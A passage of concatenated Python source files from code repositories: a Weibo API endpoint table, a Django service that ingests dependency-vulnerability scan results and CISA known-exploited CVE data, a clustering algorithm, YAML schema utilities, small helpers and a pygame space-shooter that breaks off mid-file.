#关注某话题\n 'trends__destroy': {}, #取消关注的某一个话题\n 'tags':\n { 'default':\n { 'count': 20, },\n 'page': _PAGE_PAGE,\n }, #返回指定用户的标签列表 DONE\n 'tags__tags_batch': {}, #批量获取用户标签\n 'tags__suggestions': {}, #返回系统推荐的标签列表\n 'tags__create': {}, #添加用户标签\n 'tags__destroy': {}, #删除用户标签\n 'tags__destroy_batch': {}, #批量删除用户标签\n 'register__verify_nickname': {}, #验证昵称是否可用\n 'search__suggestions__users': {}, #搜用户搜索建议\n 'search__suggestions__statuses': {}, #搜微博搜索建议\n 'search__suggestions__schools': {}, #搜学校搜索建议\n 'search__suggestions__companies': {}, #搜公司搜索建议\n 'search__suggestions__apps': {}, #搜应用搜索建议\n 'search__suggestions__at_users': {}, #@联想搜索\n 'search__topics':\n { 'default':\n {'count':200, },\n 'payload': 'statuses',\n 'page': _PAGE_PAGE,\n }, #搜索某一话题下的微博 DONE\n 'suggestions__users__hot': {}, #获取系统推荐用户\n 'suggestions__users__may_interested': {}, #获取用户可能感兴趣的人\n 'suggestions__users__by_status': {}, #根据微博内容推荐用户\n 'suggestions__statuses__hot': {}, #获取微博精选推荐\n 'suggestions__statuses__reorder': {}, #主Feed微博按兴趣推荐排序\n 'suggestions__statuses__reorder__ids': {}, #主Feed微博按兴趣推荐排序的微博ID\n 'suggestions__favorites__hot': {}, #热门收藏\n 'suggestions__users__not_interested': {}, #不感兴趣的人\n 'remind__unread_count': {}, #获取某个用户的各种消息未读数\n 'remind__set_count': {}, #对当前登录用户某一种消息未读数进行清零\n 'short_url__shorten':\n { 'payload': 'urls',\n }, #长链转短链 DONE\n 'short_url__expand': {}, #短链转长链\n 'short_url__clicks': {}, #获取短链接的总点击数\n 'short_url__referers': {}, #获取一个短链接点击的referer来源和数量\n 'short_url__locations': {}, #获取一个短链接点击的地区来源和数量\n 'short_url__share__counts': {}, #获取短链接在微博上的微博分享数\n 'short_url__share__statuses':\n { 'default':\n { 'count': 200, },\n 'payload': 'share_statuses',\n 'page': _PAGE_PAGE,\n }, #获取包含指定单个短链接的最新微博内容 DONE\n 'short_url__comment__counts': {}, #获取短链接在微博上的微博评论数\n 'short_url__comment__comments': {}, #获取包含指定单个短链接的最新微博评论\n 'short_url__info': {}, #批量获取短链接的富内容信息\n 'notification__send': {}, #给一个或多个用户发送一条新的状态通知\n 'common__code_to_location': {}, #通过地址编码获取地址名称\n 'common__get_city': {}, #获取城市列表\n 'common__get_province': {}, #获取省份列表\n 'common__get_country': {}, #获取国家列表\n 'common__get_timezone': {}, #获取时区配置表\n 'place__public_timeline': {}, #获取公共的位置动态\n 'place__friends_timeline': {}, #获取用户好友的位置动态\n 'place__user_timeline': {}, #获取某个用户的位置动态\n 'place__poi_timeline': {}, #获取某个位置地点的动态\n 'place__nearby_timeline': {}, #获取某个位置周边的动态\n 'place__statuses__show': {}, #获取动态的详情\n 'place__users__show': {}, #获取LBS位置服务内的用户信息\n 'place__users__checkins': {}, #获取用户签到过的地点列表\n 'place__users__photos': {}, #获取用户的照片列表\n 'place__users__tips': {}, #获取用户的点评列表\n 'place__users__todos': {}, #获取用户的todo列表\n 'place__pois__show': {}, #获取地点详情\n 'place__pois__users': {}, #获取在某个地点签到的人的列表\n 'place__pois__tips': {}, #获取地点点评列表\n 'place__pois__photos': {}, #获取地点照片列表\n 'place__pois__search': {}, #按省市查询地点\n 'place__pois__category': {}, #获取地点分类\n 'place__nearby__pois': {}, #获取附近地点\n 'place__nearby__users': {}, #获取附近发位置微博的人\n 'place__nearby__photos': {}, #获取附近照片\n 'place__nearby_users__list': {}, #获取附近的人\n 'place__pois__create': {}, #添加地点\n 'place__pois__add_checkin': {}, #签到\n 'place__pois__add_photo': {}, #添加照片\n 'place__pois__add_tip': {}, #添加点评\n 'place__pois__add_todo': {}, #添加todo\n 'place__nearby_users__create': {}, #用户添加自己的位置\n 'place__nearby_users__destroy': {}, #用户删除自己的位置\n 'location__base__get_map_image': {}, #生成一张静态的地图图片\n 'location__geo__ip_to_geo': {}, #根据IP地址返回地理信息坐标\n 'location__geo__address_to_geo': {}, #根据实际地址返回地理信息坐标\n 'location__geo__geo_to_address': {}, #根据地理信息坐标返回实际地址\n 'location__geo__gps_to_offset': {}, #根据GPS坐标获取偏移后的坐标\n 'location__geo__is_domestic': {}, #判断地理信息坐标是否是国内坐标\n 'location__pois__show_batch': {}, #批量获取POI点的信息\n 'location__pois__search__by_location': {}, #根据关键词按地址位置获取POI点的信息\n 'location__pois__search__by_geo': {}, #根据关键词按坐标点范围获取POI点的信息\n 'location__pois__search__by_area': {}, #根据关键词按矩形区域获取POI点的信息\n 'location__pois__add': {}, #提交一个新增的POI点信息\n 'location__mobile__get_location': {}, #根据移动基站WIFI等数据获取当前位置信息\n 'location__line__drive_route': {}, #根据起点与终点数据查询自驾车路线信息\n 'location__line__bus_route': {}, #根据起点与终点数据查询公交乘坐路线信息\n 'location__line__bus_line': {}, #根据关键词查询公交线路信息\n 'location__line__bus_station': {}, #根据关键词查询公交站点信息\n 'location__citycode': {}, #城市代码对应表\n 'location__citycode_bus': {}, #公交城市代码表\n 'location__category': {}, #分类代码对应表\n 'location__error2': {}, #地理位置信息接口错误代码及解释\n 'oauth2__authorize': {}, #请求用户授权Token\n 'oauth2__access_token': {}, #获取授权过的Access Token\n 'oauth2__get_oauth2_token': {}, #OAuth1.0的Access Token更换至OAuth2.0的Access Token\n }\n","repo_name":"seraphlnWu/observer","sub_path":"observer/platform/sina/weibo/apiv2/apiinfo.py","file_name":"apiinfo.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"8983134555","text":"from requests import delete\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nimport sys\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import transaction\n\nimport json\nfrom datetime import datetime, timedelta\nimport requests\n\nfrom vuln_backend.models import *\nfrom django.http import HttpResponse, HttpResponseBadRequest\nimport requests\nimport os\nimport zipfile\nimport shutil\nfrom threading import Thread\nimport time\n\ndef validate_request(request, headers):\n # get json\n try:\n json_data = json.loads(request.body)\n except ValueError as e:\n print(e)\n return HttpResponseBadRequest(\"Invalid JSON\")\n \n # check if repo_org and repo_name are in the json\n if 'repo_org' not in json_data:\n return HttpResponseBadRequest('No repo_org in request')\n if 'repo_name' not in json_data:\n return HttpResponseBadRequest('No repo_name in request')\n\n # get repo url\n repo_org = json_data['repo_org']\n repo_name = json_data['repo_name']\n\n orgs = os.environ['GITHUB_ACCS'].lower()\n\n # contains comma separated orgs\n orgs = orgs.split(',')\n\n # check if owner is correct\n if repo_org.lower() not in orgs:\n return HttpResponseBadRequest(\"Org not in scope\")\n \n # get repos from owner\n r = requests.get('https://api.github.com/' + str(os.environ['USERS_OR_ORGS']).lower() + '/' + repo_org.lower() + '/repos', headers=headers)\n x = 'https://api.github.com/' + str(os.environ['USERS_OR_ORGS']).lower() + '/' + repo_org.lower() + '/repos'\n print(x)\n repos = r.json()\n\n # check if this repo is in the list\n in_scope = False\n for repo in repos:\n if repo['name'] == repo_name:\n in_scope = True\n break\n \n if not in_scope:\n return HttpResponseBadRequest(\"Repo not in scope\")\n \n return None, repo_org, repo_name, json_data\n\n@csrf_exempt\ndef repo_notification(request, already_called=False, repo_org=None, repo_name=None, json_data=None):\n if request.method == 'POST':\n headers={\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token ' + os.environ['GITHUB_PAT'],\n }\n ### Validate the request\n if already_called:\n time.sleep(30)\n else:\n error, repo_org, repo_name, json_data = validate_request(request, headers)\n if error:\n return error\n\n ### Get the data\n print(\"Got job for \" + repo_org + \"/\" + repo_name)\n # get jobs from repo\n r = requests.get('https://api.github.com/repos/' + repo_org + '/' + repo_name + '/actions/artifacts', headers=headers)\n artifacts = r.json()\n with open('artifacts.json', 'w') as f:\n json.dump(artifacts, f, indent=4)\n output = []\n for artifact in artifacts['artifacts']:\n # print keys in artifact\n if artifact['name'] == 'scan':\n workflow_id = artifact['workflow_run']['id']\n # check if this job is already in the database using the\n if ScanData.objects.filter(workflow_id=workflow_id).exists():\n message = {\n \"status\": \"ok\",\n \"message\": \"scan already exists\"\n } \n else:\n print(\"new scan discovered\")\n # download the scan\n r = requests.get(artifact['archive_download_url'], headers=headers)\n # save the scan temporarily\n with open('/tmp/' + str(workflow_id) + '.zip', 'wb') as f:\n f.write(r.content)\n # unzip the scan\n with zipfile.ZipFile('/tmp/' + str(workflow_id) + '.zip', 'r') as zip_ref:\n zip_ref.extractall('/tmp/' + str(workflow_id))\n \n # call create_db_entries\n with open('/tmp/' + str(workflow_id) + '/vuln.json', 'r') as f:\n grype_file = f.read()\n with open('/tmp/' + str(workflow_id) + '/sbom.json', 'r') as f:\n syft_file = f.read()\n\n message = create_db_entries(grype_file, syft_file, json_data, workflow_id, artifact['created_at'])\n \n # delete the scan\n shutil.rmtree('/tmp/' + str(workflow_id))\n os.remove('/tmp/' + str(workflow_id) + '.zip')\n message['workflow_id'] = workflow_id\n output.append(message)\n # return json with indent\n if not already_called:\n # start repo_notification again as thread\n thread = Thread(target=repo_notification, args=(request, True, repo_org, repo_name, json_data))\n thread.start()\n return HttpResponse(json.dumps(output, indent=4), content_type='application/json')\n else:\n # return invalid method\n return HttpResponseBadRequest(\"Invalid method\")\n\n@transaction.atomic\ndef create_db_entries(grype_file, syft_file, metadata_json, workflow_id, created_at):\n try:\n # read the files and parse to json\n grype_json = json.loads(grype_file)\n syft_json = json.loads(syft_file)\n\n except Exception as e:\n print(e)\n return {\"status\": \"error\", \"message\": \"Error parsing the files\"}\n\n\n # get or create the repository entry\n repository = parse_repo_content(metadata_json)\n\n # add scan data to the database\n # --> get the timestamp of the scan\n \n scan_entry = ScanData.objects.create(\n created_at=created_at,\n repository=repository,\n workflow_id=workflow_id,\n grype_scan=grype_json,\n syft_scan=syft_json\n )\n\n # add artifacts and vulnerabilities\n artifact_stats, created_artifacts = parse_syft_scan(syft_json, scan_entry)\n vuln_stats = parse_grype_scan(grype_json, scan_entry, created_artifacts)\n\n # add an entry to the statistics table\n Statistics.objects.create(\n scan=scan_entry,\n number_dependencies=len(artifact_stats['artifacts']),\n number_vulnerabilities=len(vuln_stats['vulnerabilities']),\n number_vuln_critical=vuln_stats['Critical'],\n number_vuln_high=vuln_stats['High'],\n number_vuln_medium=vuln_stats['Medium'],\n number_vuln_low=vuln_stats['Low'],\n number_vuln_negligible=vuln_stats['Negligible'],\n number_vuln_unknown=vuln_stats['Unknown']\n )\n\n # check if there are known exploited vulnerabilities in the scan\n exploited_vulns = get_known_exploited_vulns()\n print(\"The following vulnerabilities have been identified as currently being exploited: \" + str(exploited_vulns))\n \n return {\"status\": \"ok\"}\n\ndef parse_syft_scan(syft_json, scan_entry):\n artifact_stats = {\n 'artifacts': []\n }\n created_artifacts = []\n for artifact in syft_json['artifacts']:\n # update or create the artifact entry\n new_artifact, created = Artifacts.objects.get_or_create(\n name=artifact['name'],\n version=artifact['version'],\n purl=artifact['purl'],\n type=artifact['type'],\n cpes=artifact['cpes'],\n licenses=artifact['licenses']\n )\n\n # add artifact to scan\n new_artifact.scan.add(scan_entry)\n\n # add artifact to stats\n if (artifact['name'], artifact['version']) not in artifact_stats['artifacts']:\n artifact_stats['artifacts'].append((artifact['name'], artifact['version']))\n created_artifacts.append(new_artifact)\n\n return artifact_stats, created_artifacts\n\ndef parse_grype_scan(grype_json, scan_entry, created_artifacts):\n vuln_stats = {\n 'vulnerabilities': [],\n 'Critical': 0, 'High': 0, 'Medium': 0, 'Low': 0, 'Negligible': 0, 'Unknown': 0\n }\n for match in grype_json['matches']:\n vulnerability = match['vulnerability']\n\n # get all entries that have cvss informations\n cvss_vulns = []\n if 'cvss' in vulnerability and vulnerability['cvss'] != []:\n cvss_vulns.append(vulnerability)\n for related_vuln in match['relatedVulnerabilities']:\n if 'cvss' in related_vuln and related_vuln['cvss'] != []:\n cvss_vulns.append(related_vuln)\n \n # if we have at least one cvss entry: \n if len(cvss_vulns) != 0:\n # try to find the nvd entry in the cvss entries\n for vuln in cvss_vulns:\n if 'nvd' in vuln['namespace']:\n vulnerability = vuln\n break\n else:\n # if we don't have any cvss entry, take try to find the nvd entry\n if 'nvd' not in vulnerability['namespace']:\n for related_vuln in match['relatedVulnerabilities']:\n if 'nvd' in related_vuln['namespace']:\n vulnerability = related_vuln\n break\n \n # try to find the artifact entry in the already created artifacts\n artifact = None\n for created_artifact in created_artifacts:\n if created_artifact.name == match['artifact']['name'] and created_artifact.version == match['artifact']['version']:\n artifact = created_artifact\n break\n\n # because we want a version history, we have to create a new vulnerability entry\n # only reuse the vulnerability if everything is the same\n vuln, created = Vulnerabilities.objects.get_or_create(\n vuln_id=vulnerability['id'],\n severity=vulnerability['severity'],\n cvss=vulnerability['cvss'],\n fix=match['vulnerability']['fix'],\n description=vulnerability['description'] if 'description' in vulnerability else None,\n url=vulnerability['dataSource'] if 'dataSource' in vulnerability else None,\n )\n\n # add scan and artifact entry to the vulnerability\n vuln.scan.add(scan_entry)\n vuln.artifact.add(artifact)\n\n # add vuln to stats \n if vulnerability['id'] not in vuln_stats['vulnerabilities']:\n vuln_stats['vulnerabilities'].append(vulnerability['id'])\n try:\n vuln_stats[vulnerability['severity']] += 1\n except KeyError:\n vuln_stats['Unknown'] += 1\n\n return vuln_stats\n\ndef parse_repo_content(metadata_json):\n try:\n repository, created = Repositories.objects.get_or_create(\n url=metadata_json['repo_url'],\n defaults={'organization': metadata_json['repo_org'], 'name': metadata_json['repo_name']}\n )\n except Exception as e:\n print(e)\n return {\"status\": \"error\", \"message\": \"Error parsing the repository data\"}\n print('created new Repository: ', created)\n return repository\n\n\ndef find_best_version(grype_json):\n # extract all vulnerabilities with a known fix\n fixed_vulns = {}\n for match in grype_json['matches']:\n fix=match['vulnerability']['fix']\n if fix[\"state\"] == \"fixed\":\n fixed_vulns[match['vulnerability']['id']]['versions'] = fix[\"versions\"]\n fixed_vulns[match['vulnerability']['id']]['purl'] = match['artifact']['purl']\n pass\n\ndef get_known_exploited_vulns():\n\n # Retrieve known exploited vulnerabilities from cisa.gov\n response = requests.get(\"https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json\")\n json_response = response.json()\n vulns = json_response.get('vulnerabilities')\n\n week_delta = timedelta(weeks=12)\n now = datetime.now()\n\n exploited_vulns = []\n for vuln in vulns:\n dueDate = datetime.strptime(vuln.get('dueDate'), '%Y-%m-%d')\n\n # check if vuln is in given timeframe\n if now <= dueDate + week_delta:\n try:\n cve_id = vuln.get('cveId')\n vuln_entry = Vulnerabilities.objects.get(vuln_id=cve_id)\n vuln_entry.actively_exploited = True\n vuln_entry.save()\n exploited_vulns.append(cve_id)\n print(cve_id, 'is actively exploited')\n\n except Vulnerabilities.DoesNotExist:\n pass\n \n return exploited_vulns\n","repo_name":"Root-DE/Applied-Cybersecurity-Django","sub_path":"src/applied_cybersec/vuln_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"20768979685","text":"from __future__ import \\\n annotations # allows us to use ClusterNode in type hints, which will be default in Python 3.10\n\nfrom dataclasses import dataclass, field\nfrom math import inf\n\nimport numpy as np\n\nimport algorithms.kmedplusplus\nfrom solver_interface import Instance, ExplainableOutput, ClusterNode, make_kids\n\n\n@dataclass\nclass Esfandiari:\n \"\"\"\"Solver for the k-median problem that uses the method proposed by Makarychev et al, that solves the\n k-median problem with an explainable solution.\"\"\"\n\n def __call__(self, instance, pre_clusters):\n \"\"\"\n Solve a k-median problem with the method proposed by Makarychev et al\n @param instance: instance of the k-median problem\n @return: an explainable solution to the k-median problem\n \"\"\"\n leaves, split_nodes = build_tree(instance, pre_clusters)\n\n return ExplainableOutput(instance, leaves, split_nodes, pre_clusters)\n\n\ndef build_tree(instance: Instance, pre_clusters: dict):\n dim = instance.dimension()\n X = instance.points\n u0 = ClusterNode(pre_clusters, np.array([[-inf, inf]] * dim), list(pre_clusters.keys())) # root\n leaves = []\n split_nodes = []\n\n def median_split(u: ClusterNode):\n if u.is_homogeneous():\n leaves.append(u)\n else:\n split_nodes.append(u)\n centers = u.set\n a = [min([center.coordinates[i] for center in centers]) for i in range(dim)]\n b = [max([center.coordinates[i] for center in centers]) for i in range(dim)]\n R = [a[i] - b[i] for i in range(dim)]\n probabilities = [R[i] / sum(R) for i in range(dim)]\n r = np.random.choice(np.arange(0, dim),\n p=probabilities) # np.random method needed for p argument!\n z = np.random.uniform(a[r], b[r])\n\n node_L, node_R = make_kids(u, r, z, True)\n u.children = [node_L, node_R]\n median_split(node_L)\n median_split(node_R)\n\n if not u0.is_homogeneous():\n median_split(u0)\n return leaves, split_nodes\n\n","repo_name":"EsmeeHuijten/explainable-clustering-algorithms","sub_path":"algorithms/Esfandiari_algorithm.py","file_name":"Esfandiari_algorithm.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35739354150","text":"import os\nimport ntpath\nimport yaml\n\nfrom distutils import dir_util\nfrom distutils import file_util\n\nfrom skybase.utils import schema as schema_util\n\n\ndef set_indicators():\n global BOOL_TYPE_INDICATOR\n BOOL_TYPE_INDICATOR = \"CHANGE_ME[BOOL]\"\n global INT_TYPE_INDICATOR\n INT_TYPE_INDICATOR = \"CHANGE_ME[INT]\"\n global STR_TYPE_INDICATOR\n STR_TYPE_INDICATOR= \"CHANGE_ME[STRING]\"\n global STR_TYPE_OPTIONAL_INDICATOR\n STR_TYPE_OPTIONAL_INDICATOR= \"CHANGE_OR_REMOVE_ME[STRING]\"\n global LIST_TYPE_INDICATOR\n LIST_TYPE_INDICATOR = [\"CHANGE_OR_REMOVE_ME[LIST_ITEM]\", \"CHANGE_OR_REMOVE_ME[LIST_ITEM]\"]\n global DICT_KEY_TYPE_INDICATOR\n DICT_KEY_TYPE_INDICATOR = \"CHANGE_OR_REMOVE_ME[DICT_ITEM_KEY]\"\n global DICT_VALUE_TYPE_INDICATOR\n DICT_VALUE_TYPE_INDICATOR = \"CHANGE_OR_REMOVE_ME[DICT_ITEM_VALUE]\"\n\n global INDICATORS\n INDICATORS = [BOOL_TYPE_INDICATOR, INT_TYPE_INDICATOR, INT_TYPE_INDICATOR,\n STR_TYPE_INDICATOR, STR_TYPE_OPTIONAL_INDICATOR,\n DICT_KEY_TYPE_INDICATOR, DICT_VALUE_TYPE_INDICATOR]\n\n global REQUIRED_INDICATORS\n REQUIRED_INDICATORS = [BOOL_TYPE_INDICATOR, INT_TYPE_INDICATOR, INT_TYPE_INDICATOR,\n STR_TYPE_INDICATOR, DICT_KEY_TYPE_INDICATOR, DICT_VALUE_TYPE_INDICATOR]\n\n global LIST_TYPE\n LIST_TYPE = \"LIST\"\n\n\ndef get_schema(schema_name, operand):\n imported = getattr(__import__(\"skybase.schemas\", fromlist=[operand]), operand)\n if hasattr(imported, schema_name):\n return getattr(imported, schema_name)\n return []\n\n\ndef get_file_schema_name(filename):\n filename = os.path.basename(filename)\n return filename.replace('.', '_') + '_schema'\n\n\ndef create_dir_tree_from_schema(base_dir, operand, dry_run=False, force=False):\n result_string = \"\"\n for entry in get_schema(operand + \"_schema\", operand):\n dir_path = os.path.join(base_dir, \"/\".join(entry[0]))\n\n # create directories\n if not os.path.exists(dir_path):\n if dry_run:\n result_string += \"Directory \" + dir_path + \" would be created.\\n\"\n else:\n result_string += \"Creating directory \" + dir_path + \"\\n\"\n dir_util.mkpath(dir_path, dry_run=dry_run)\n\n # if a file is defined, create file\n for file in entry[1]:\n schema_attr = get_file_schema_name(file)\n file_schema = get_schema(schema_attr, operand)\n if file_schema:\n result_string += create_yaml_from_schema(os.path.join(dir_path, file), file_schema, operand,\n dry_run=dry_run, force=force)\n else:\n if dry_run:\n result_string += \"File \" + os.path.join(dir_path, file) + \" would be created:\\n\"\n result_string += \"#Blank \" + file + \" created by skybase\\n\"\n else:\n result_string += \"Creating file \" + os.path.join(dir_path, file) + \"\\n\"\n file_util.write_file(os.path.join(dir_path, file), \"#Blank \" + file + \" created by skybase\")\n return result_string\n\n\ndef create_yaml_from_schema(path, file_schema, operand, dry_run=False, force=False):\n result_string = \"\"\n content_index = 0\n if isinstance(file_schema[0], basestring):\n header = file_schema[0]\n content_index = 1\n content = file_schema[content_index:]\n content_dict = create_dict_from_schema(content, os.path.basename(path).split('.')[0], operand)\n\n noalias_dumper = yaml.dumper.SafeDumper\n noalias_dumper.ignore_aliases = lambda self, data: True\n noalias_dumper.add_representer(schema_util.UnsortableOrderedDict, yaml.representer.SafeRepresenter.represent_dict)\n\n if dry_run:\n result_string += \"File \" + path + \" would be created:\\n\"\n result_string += header + \"\\n\"\n result_string += yaml.dump(content_dict, allow_unicode=True, default_flow_style=False, Dumper=noalias_dumper)\n elif (not force) and os.path.exists(path):\n result_string += \"File \" + path + \" exists, use --force to override.\\n\"\n else:\n result_string += \"Creating file \" + path + \"\\n\"\n file_util.write_file(path, header + '\\n')\n with open(path, 'w') as temp_file:\n yaml.dump(content_dict, temp_file, allow_unicode=True, default_flow_style=False, Dumper=noalias_dumper)\n temp_file.close()\n return result_string\n\n\ndef create_dict_from_schema(content_schema, schema_attr_prefix, operand):\n dict = schema_util.UnsortableOrderedDict()\n for line in content_schema:\n key = line[0]\n val = line[1]\n\n if val and (val[0] == LIST_TYPE):\n schema_attr_prefix = schema_attr_prefix + '_' + key[-1]\n sub_schema_attr = schema_attr_prefix + '_yaml_schema'\n sub_dict = create_dict_from_schema(get_schema(sub_schema_attr, operand), schema_attr_prefix, operand)\n list = []\n list.append(sub_dict)\n line_dict = schema_util.rec_ordered_dict_from_list(key, list, True)\n else:\n line_dict = schema_util.rec_ordered_dict_from_list(key, val, False)\n\n dict = schema_util.rec_ordered_dict_merge(dict, line_dict)\n return dict\n\n\ndef create_unordered_dict_from_schema(content_schema, schema_attr_prefix, operand):\n dict = {}\n for line in content_schema:\n key = line[0]\n val = line[1]\n\n if val and (val[0] == LIST_TYPE):\n schema_attr_prefix = schema_attr_prefix + '_' + key[-1]\n sub_schema_attr = schema_attr_prefix + '_yaml_schema'\n sub_dict = create_dict_from_schema(get_schema(sub_schema_attr, operand), schema_attr_prefix, operand)\n list = []\n list.append(sub_dict)\n line_dict = schema_util.rec_dict_from_list(key, list, True)\n else:\n line_dict = schema_util.rec_dict_from_list(key, val, False)\n\n dict = schema_util.rec_dict_merge(dict, line_dict)\n return dict\n\n\ndef get_missing_paths_from_schema(base_dir, operand):\n dir_dict = {}\n root_dir = base_dir.rstrip(os.sep)\n start = root_dir.rfind(os.sep) + 1\n for path, dirs, files in os.walk(root_dir):\n folders = path[start:].split(os.sep)\n subdir = dict.fromkeys(files, True)\n parent = reduce(dict.get, folders[:-1], dir_dict)\n parent[folders[-1]] = subdir\n dir_dict = dir_dict[ntpath.basename(base_dir)]\n dir_schema = get_schema(operand + \"_schema\", operand)\n invalid = schema_util.verify_dict_from_schema(dir_dict, dir_schema)\n return [base_dir + '/' + s for s in invalid]\n\n\ndef validate_yaml_with_indicators(yaml_file):\n result = {\"valid\": True, \"result_string\": \"\"}\n with open(yaml_file, 'r') as temp_file:\n for line in temp_file:\n if any(s in line for s in REQUIRED_INDICATORS):\n result[\"valid\"] = False\n result[\"result_string\"] += \"Invalid value in \" + yaml_file + \", line:\" + line\n temp_file.close()\n return result\n\n\ndef validate_yaml_with_schema(yaml_file, operand):\n result = {\"valid\": True, \"result_string\": \"\"}\n if os.path.basename(yaml_file) != \"manifest.yaml\":\n if not validate_yaml_with_indicators(yaml_file)[\"valid\"]:\n result[\"valid\"] = False\n result[\"result_string\"] += validate_yaml_with_indicators(yaml_file)[\"result_string\"]\n return result\n with open(yaml_file, 'r') as temp_file:\n file_dict = {}\n try:\n file_dict = yaml.load(temp_file)\n except yaml.scanner.ScannerError:\n result[\"valid\"] = False\n result[\"result_string\"] += \"Invalid yaml syntax \" + yaml_file + '\\n'\n if file_dict:\n schema_attr_prefix = os.path.basename(yaml_file).split('.')[0]\n schema_dict = create_dict_from_schema(get_schema(get_file_schema_name(yaml_file), operand),\n schema_attr_prefix, operand)\n schema_dict = schema_util.UnsortableOrderedDict({key: value for key, value in schema_dict.items()\n if key is not '#'})\n if schema_dict:\n if not file_dict:\n result[\"valid\"] = False\n result[\"result_string\"] += \"No content in \" + yaml_file + '\\n'\n else:\n key_result = schema_util.verify_dict_keys(schema_dict, file_dict, yaml_file)\n if not key_result[\"valid\"]:\n result[\"valid\"] = False\n result[\"result_string\"] += key_result[\"result_string\"]\n temp_file.close()\n return result\n\n","repo_name":"markosys/skybase.io","sub_path":"skybase/schemas/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26883914586","text":"# encoding=utf-8\nimport redis\nimport re\nimport pickle\nredis_cli = redis.StrictRedis()\nimport hashlib\nimport re\ndef get_md5(url):\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\ndef extract_num(text):\n #从字符串中提取出数字\n match_re = re.match(\".*?(\\d+).*\", text)\n if match_re:\n nums = int(match_re.group(1))\n else:\n nums = 0\n\n return nums\n\ndef real_time_count(key, init):\n if redis_cli.get(key):\n count = pickle.loads(redis_cli.get(key))\n count = count + 1\n count = pickle.dumps(count)\n redis_cli.set(key, count)\n else:\n count = pickle.dumps(init)\n redis_cli.set(key, count)\n\ndef exclude_none(value):\n \"\"\"排除none值\"\"\"\n if value:\n return value\n else:\n value = \"无\"\n return value\n\ndef extract_num_include_dot(text):\n # 从包含,的字符串中提取出数字\n text_num = text.replace(',', '')\n try:\n nums = int(text_num)\n except:\n nums = -1\n return nums\n","repo_name":"acryboyhyj/search","sub_path":"Article/Article/util/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20515573433","text":"import json\nimport os\n\npath = \"config/levels.json\"\nwith open(path, 'r') as lvls:\n levels = json.load(lvls)\n\n# level_names = [levels[level] for level in levels]\n# print(level_names)\n\n\ndef load_map(level_name):\n if level_name in levels.keys():\n return Level(levels[level_name])\n\n\nclass Level:\n def __init__(self, level_map):\n # load instance variables set to the values in the loaded dictionary for the level\n self.name = level_map['name']\n self.x_bound = level_map['x_bound']\n self.y_bound = level_map['y_bound']\n self.collisions = level_map['collisions']\n self.spawn = level_map['spawn_pos']\n self.spawn_x = self.spawn['x']\n self.spawn_y = self.spawn['y']\n\n","repo_name":"jakeperman/DungeonAdventure","sub_path":"old/level_load.py","file_name":"level_load.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"74062487134","text":"#the space war game created by jjjmmmsss aka james the great aka the rider aka the cruiser aka i love this one \"\"dab sun\"\" aka the sun of god aka i dont care aka i will forget you in minutes aka decision maker aka ...\r\nimport sys\r\nimport pygame\r\nimport random\r\nfrom math import*\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600,700))\r\nicon = pygame.image.load(\"images/space.png\")\r\npygame.display.set_caption(\"space fight\")\r\npygame.display.set_icon(icon)\r\nbackground = pygame.image.load(\"images/background.png\")\r\n\r\n\r\n#the random position of the enemy will going to appear \r\nen_posX = random.randrange(100,500)\r\nen_posY = 50\r\nthe_first_img = pygame.image.load(\"images/startbg.png\")\r\n#text\r\nscore = 0\r\ntext_posX = 0\r\ntext_posY = 0\r\ntext = pygame.font.Font(\"golden_metafor/Golden Metafor Regular.ttf\",24)\r\ndef the_win_start():\r\n global screen,the_first_img,text\r\n start = True\r\n while start:\r\n \r\n screen.blit(the_first_img,(0,0))\r\n score_s = text.render(\"Press s to start the game press q to quit\",True,(255,0,255))\r\n screen.blit(score_s,(20,300))\r\n for ev in pygame.event.get():\r\n if ev.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n if ev.type == pygame.KEYDOWN:\r\n if ev.key == pygame.K_s:\r\n main_fun()\r\n start = False\r\n \r\n if ev.key == pygame.K_q:\r\n pygame.quit()\r\n pygame.display.flip() \r\nclass player():\r\n def __init__(self):\r\n #player position and other settings\r\n self.player = pygame.image.load(\"images/player.png\")\r\n self.player_posX = 250\r\n self.player_posY = 580\r\n self.playerXchange = 0\r\n self.playerYchange = 0\r\n self.player_speed = 4\r\n#the player function where by it will be used to draw the player \r\n def player_fun(self):\r\n screen.blit(self.player,(self.player_posX,self.player_posY))\r\n \r\nclass enemy():\r\n def __init__(self):\r\n #enemy position and other settings\r\n self.enemy_posX = 250\r\n self.enemy_posY = 0\r\n self.enemyXchange = 50\r\n self.enemyYchange = 15\r\n self.enemy_speed = 5\r\n self.enemy_health = 9\r\n self.num_of_enemy = 5\r\n self.red = (255,0,0)\r\n self.rectenemy = pygame.Rect(self.enemy_posX + 17,self.enemy_posY + 5,65,94)\r\n self.hitbox = (self.enemy_posX +17,self.enemy_posY + 5,65,94)\r\n self.enemy = pygame.image.load(\"./images/enemy.png\")\r\n #the enemy function where by it will be used to draw the enemy\r\n def enemy_fun(self,x,y):\r\n screen.blit(self.enemy,(x,y))\r\n \r\n \r\nclass rocket():\r\n \r\n def __init__(self):\r\n #rocket of the player position, speed and other settings\r\n self.player_posX = 250\r\n self.player_posY = 580\r\n self.enemy_posX = 250\r\n self.enemy_posY = 0\r\n self.rocket_capacity = 1000\r\n self.rocket_speed = 10\r\n self.rocket_posY = 